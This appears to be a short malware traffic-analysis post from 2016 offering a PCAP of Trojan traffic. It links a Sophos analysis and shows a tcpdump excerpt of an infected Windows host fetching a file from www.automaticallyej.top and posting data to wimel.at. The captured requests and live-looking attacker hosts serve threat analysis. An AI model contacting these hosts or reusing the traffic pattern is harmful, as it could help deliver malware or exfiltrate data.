wimel.at POST /news www.automaticallyej.top Malware Trojan PCAP file download Traffic Analysis

Download Attachments

  • 1 pcap datbb
    Date added: November 16, 2016 3:02 am Added by: admin File size: 168 KB Downloads: 90

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AUKP/detailed-analysis.aspx

 

2016-11-15 19:48:59.712525 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [.], ack 1043924111, win 256, length 0
E..(D.@….0…f.^>..f.PURl.>9..P………….
2016-11-15 19:48:59.715879 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET /admin.php?f=2.dat HTTP/1.1
E..WD.@……..f.^>..f.PURl.>9..P…6V..GET /admin.php?f=2.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.automaticallyej.top
Connection: Keep-Alive

2016-11-15 19:49:08.705790 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [.], ack 714180781, win 256, length 0
E..(..@….5…f..em.o.P&..U*…P…;………
2016-11-15 19:49:08.706516 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [P.], seq 0:966, ack 1, win 256, length 966: HTTP: POST /news.php HTTP/1.1
E…..@….n…f..em.o.P&..U*…P…….POST /news.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: wimel.at
Content-Length: 768
Connection: Close

Leave a Reply